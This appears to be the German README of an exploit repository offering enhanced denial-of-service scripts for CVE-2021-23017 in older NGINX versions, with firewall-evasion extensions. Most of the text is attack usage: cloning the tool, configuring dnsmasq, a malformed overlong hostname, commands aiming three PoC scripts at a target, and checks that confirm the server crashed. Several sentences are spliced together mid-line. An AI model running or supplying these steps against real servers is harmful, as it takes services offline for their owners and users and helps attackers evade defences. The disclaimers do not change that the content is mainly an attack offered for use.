
Sicherheitslücke in NGINX-Servern (Versionen 0.6.18–1.20.0). Die Skripte zielen darauf ab, einen Denial-of-Service (DoS) durch das Senden bösartiger DNS-Antworten zu verursachen, mit Erweiterungen zur Umgehung von Firewalls.
Sicherheitslücke in NGINX-Servern (Versionen 0.6.18–1.20.0). Die Skripte zielen darauf ab, einen Denial-of-Service (DoS) durch das Senden bösartiger DNS-Antworten zu verursachen, mit Erweiterungen zur Umgehung von Firewalls. Dies ist eine verbesserte Version des ursprünglichen PoC von M507/CVE-2021-23017-PoC .
Warnung: Nur mit ausdrücklicher schriftlicher Genehmigung des Systembesitzers verwenden. Unbefugtes Testen ist illegal.
sudo apt-get update
sudo apt-get install python3-scapy dnsmasq
pip3 install scapy requests
git clone https://github.com/6lj/EVIL-CVE-2021-23017-Update-2025.git
cd EVIL-CVE-2021-23017-Update-2025
dnsmasq ein:
sudo nano /etc/dnsmasq.conf
address=/test.example.com/192.168.1.100
sudo systemctl start dnsmasq
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.test.com), um den NGINX-Server zum Absturz zu bringen.curl und dig aus, um die Sicherheitslücke auszunutzen.Im Vergleich zu M507/CVE-2021-23017-PoC:
poc1.2.3.py für gleichzeitiges Sniffen, DNS-Senden und Auslösen von Abfragen. Sie müssen die drei zusammen ausführen.Führen Sie die drei zusammen aus und starten Sie mit den entsprechenden Argumenten (ersetzen Sie <target_ip>, <your_dns_server_ip>, <target_url>).
poc.pypython3 poc.py --dns_server <your_dns_server_ip> --iface eth0 --count 50 --target_url http://<target_url>
poc2.pypython3 poc2.py --target <target_ip> --dns_server <your_dns_server_ip> --iface eth0 --count 50 --target_url http://<target_url>
poc3.py (Empfohlen)python3 poc3.py --target <target_ip> --dns_server <your_dns_server_ip> --iface eth0 --target_url http://<target_url>
python3 poc3.py --target 192.168.1.100 --dns_server 192.168.1.101 --iface eth0 --target_url http://192.168.1.100
Serverstatus überprüfen:
curl -I http://<target_url>
502 Bad Gateway oder 503 Service Unavailable weist auf einen Serverabsturz hin.200 OK deutet auf keine Sicherheitslücke oder Firewall-Blockierung hin.DNS-Verkehr überwachen:
sudo wireshark -f "udp port 53"
Haftungsausschluss: Nur zu Bildungszwecken. Die Autoren sind nicht verantwortlich für Missbrauch.